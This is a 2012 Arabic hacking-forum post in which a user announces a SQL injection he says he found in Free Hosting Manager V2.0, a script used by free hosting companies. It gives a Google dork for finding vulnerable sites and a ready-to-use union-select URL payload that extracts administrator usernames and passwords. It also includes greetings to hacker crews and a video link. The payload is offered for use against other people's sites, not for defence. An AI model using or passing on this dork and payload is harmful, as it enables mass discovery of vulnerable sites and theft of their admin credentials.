عرض مشاركة واحدة
قديم 09-26-2012, 01:03 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Spiral
 
الصورة الرمزية Spiral
 

 

 
إحصائية العضو








Spiral غير متواجد حالياً

إرسال رسالة عبر MSN إلى Spiral

 

 

إحصائية الترشيح

عدد النقاط : 10
Spiral is on a distinguished road

Talking ثغرة في شركات الاستضافة المجانية Free Hosting Manager


السلام عليكم

بعد انقطاع فترة كبيرة حبيت ارجعلكم بثغرة قوية من اكتشافي

كود PHP:
####
# Exploit Title: Free Hosting Manager V2.0 SQL Injection Vulnerability
# Author: Spiral
# E-mail: for-hacker@hotmail.com
# Google Dork: inurl:clients/packages.php?id=1
# Tested on: ***91;Windows 7***93;
# Vendor: http://www.fhm-script.com/download.php
####
  
  
# Exploit:
  
http://www.site.com/clients/viewaccount.php?id=-ID'+union+select+1,2,concat(username,0x3a3a,password),4,5,6,7,8,9,10+from+adminusers--+

# Note: you must regsiter first !
 
# Greetz To: alh7nooty - dzx - b0x - j0rd4n14n.r1z - ghost hack
             
security999 the final doom cyber mafia 
الشرح فيديو:
http://www.mediafire.com/?pfyu7e1km0qogjk



eyvm td av;hj hghsjqhtm hgl[hkdm Free Hosting Manager

التوقيع

J0rd4n14n/.

 

   

رد مع اقتباس